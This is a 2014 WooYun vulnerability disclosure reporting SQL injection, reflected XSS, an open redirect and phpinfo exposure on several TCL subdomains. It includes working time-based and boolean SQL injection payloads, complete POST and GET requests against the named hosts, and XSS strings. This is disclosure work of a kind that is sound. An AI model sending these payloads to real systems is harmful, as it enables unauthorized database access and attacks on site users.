当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066348

漏洞标题:TCL 高危安全漏洞礼包(SQL注入,XSS 等)

相关厂商:TCL官方网上商城

漏洞作者: Eoh

提交时间:2014-07-14 14:54

修复时间:2014-08-28 14:56

公开时间:2014-08-28 14:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-14: 细节已通知厂商并且等待厂商处理中
2014-07-14: 厂商已经确认,细节仅向厂商公开
2014-07-24: 细节向核心白帽子及相关领域专家公开
2014-08-03: 细节向普通白帽子公开
2014-08-13: 细节向实习白帽子公开
2014-08-28: 细节向公众公开

简要描述:

详细说明:

多个分站存在SQL注入

漏洞证明:

SQL盲注
http://battery.tcl.com
1、参数:smname
http://battery.tcl.com/read_products.php?smname=1'%22
2、参数:offset
http://battery.tcl.com/news_gs.php?offset=1'%22

battery.png


http://magazine.tcl.com
1、参数:txtuserid
* -1' OR 3*2*0=6 AND 000279=000279 -- => FALSE
* -1' OR 3*2*1=6 AND 000279=000279 -- => TRUE
POST请求:
http://magazine.tcl.com/manager/login.aspx
bnok=%c8%b7%b6%a8&password=g00dPa%24%24w0rD&txtuserid=-1'%20OR%203*2*1%3d6%20AND%20000279%3d000279%20--%20&__EVENTVALIDATION=/wEWBAKZ8PLhCAKz8dzmCQLyveCRDwKti4TYC7mlf8tzPuNjnDolSoWfnjAXxdRb&__VIEWSTATE=/wEPDwUKMTQ2NTI5ODg0N2RkueS/f%2ba8T7EhKt660xbvO1hRf1k%3d
2、参数:txtuserid
* bFmvdmCl'; waitfor delay '0:0:9' -- => 9.048 s
* 1LSMNbtU'; waitfor delay '0:0:0' -- => 0.047 s
POST请求:
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=/en/manager/Default.aspx
bnok=%c8%b7%b6%a8&password=g00dPa%24%24w0rD&txtuserid=JfX0oI0u';%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWBAKahK3uBwKz8dzmCQLyveCRDwKti4TYCw2HPlKnknPK%2bRkeJ%2bbFTWFlpVtu&__VIEWSTATE=/wEPDwUKMTQ2NTI5ODg0N2RkgU6lqdIp0F6AB6xsrokPgosgFd4%3d
http://mitv.tcl.com
参数:emailType
* %40tcl.com' AND 3*2*0=6 AND '0002lOo'='0002lOo => FALSE
* %40tcl.com' AND 3*2*1=6 AND '0002lOo'='0002lOo => TRUE
POST请求:
http://mitv.tcl.com/DRP/register/saveRegisterInfo
emailType=%2540tcl.com'%20AND%203*2*1%3d6%20AND%20'0002lOo'%3d'0002lOo&userRegisterInfo.currentPassword=g00dPa%24%24w0rD&userRegisterInfo.firstName=gfkvwwdv&userRegisterInfo.gender=F&userRegisterInfo.lastName=gfkvwwdv&userRegisterInfo.password=g00dPa%24%24w0rD&userRegisterInfo.userLoginId=gfkvwwdv
http://tclcom.tcl.com
参数:lang,year,tab,type
* (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.13 s
* (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.124 s
GET请求:
http://tclcom.tcl.com/php/load_articles.php?lang=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&page=oannouncement&tab=0&type=8&year=2014
http://kt.tcl.com
参数:value(userName)
POST请求:
http://kt.tcl.com/web/SubmitLogin.do
Submit=%e6%8f%90%20%e4%ba%a4&value(entcode)=&value(password)=g00dPa%24%24w0rD&value(userName)=1'%22
http://lighting.tcl.com
参数:ID
* 263 AND 3*2*0=6 AND 891=891 => FALSE
* 263 AND 3*2*1=6 AND 891=891 => TRUE
http://lighting.tcl.com/cn/products-d.aspx?ID=263%20AND%203*2*1%3d6%20AND%20891%3d891&SortID=95
反射型XSS
参数:loginname,name 都存在
http://developer.tcl.com/devopen/reg2.jsp?activecode=&loginname=ecclfkif'%22()%26%25<ScRiPt%20>prompt(917830)</ScRiPt>&name=rhxgwmav
http://developer.tcl.com/devopen/repsw2.jsp?loginname=ukyntmxs%3CScRiPt%20%3Eprompt(966959)%3C/ScRiPt%3E
参数:page
http://tclcom.tcl.com/php/load_articles.php?lang=null&page=oannouncement'%20onmouseover%3dprompt(963089)%20bad%3d'&tab=1&type=8&year=2014
参数:cid
http://hao.tcl.com/view/product/product!show.action?cid=85%22%20onmouseover%3dprompt(913509)%20bad%3d%22&page.pageNo=e&page.pageSize=50&tid=
http://kt.tcl.com/web/DefaultLoginUser.do/</title>1<ScRiPt>prompt(969243)</ScRiPt>
URL跳转
http://developer.tcl.com/devopen/logsubmit.jsp?next=http://www.wooyun.org
phpinfo 信息泄漏
http://tclcom.tcl.com/info.php

修复方案:

修复方案:
过滤危险字符,参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-14 15:30

厂商回复:

感谢您的关注,已转交相关单位确认处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-03 23:37 | 深蓝 ( 普通白帽子 | Rank:960 漏洞数:220 | 我们不是骇客,我们是黑客,我们维护互联网...)

    10WB 哈哈 无良啊